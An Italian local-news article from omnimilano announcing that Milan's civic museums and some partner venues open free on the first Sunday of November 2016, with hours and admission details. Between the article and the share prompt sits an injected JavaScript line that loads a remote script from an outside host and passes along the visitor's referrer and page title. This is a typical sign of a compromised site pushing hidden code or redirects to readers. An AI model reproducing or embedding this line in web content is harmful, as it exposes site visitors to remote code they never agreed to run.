"/>
giovedì 24 agosto 2017 07:03:59
omnimilano

CULTURA, TORNA DOMANI ‘DOMENICA AL MUSEO’

5 novembre 2016 Cronaca

Domani ritorna ‘Domenica al Museo’, l’iniziativa del Comune di Milano e del MIBACT che prevede l’apertura gratuita di tutti i musei civici ogni prima domenica del mese.
Si potranno visitare gratuitamente l’Acquario Civico, i Musei del Castello Sforzesco, il Museo del Risorgimento, Palazzo Morando, la Galleria d’Arte Moderna, il Museo Archeologico, il Museo di Storia Naturale e il Museo della Pietà Rondanini, Casa Museo Boschi di Stefano e lo Studio Museo Francesco Messina. I visitatori potranno recarsi anche all’Armani/Silos che aderisce all’iniziativa (via Bergognone 40, aperto dalle 11 alle 19).
L'ingresso al Museo del Novecento è ridotto a 6 euro e comprende sia la visita alle Collezioni che alla mostra “Boom 60! Era Arte Moderna”.
L’orario di apertura delle sedi espositive andrà dalle ore 9 alle ore 17.30, quindi l’ultimo ingresso sarà alle 16.30 per tutti, sia singoli che gruppi, provvisti o meno di prenotazione.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo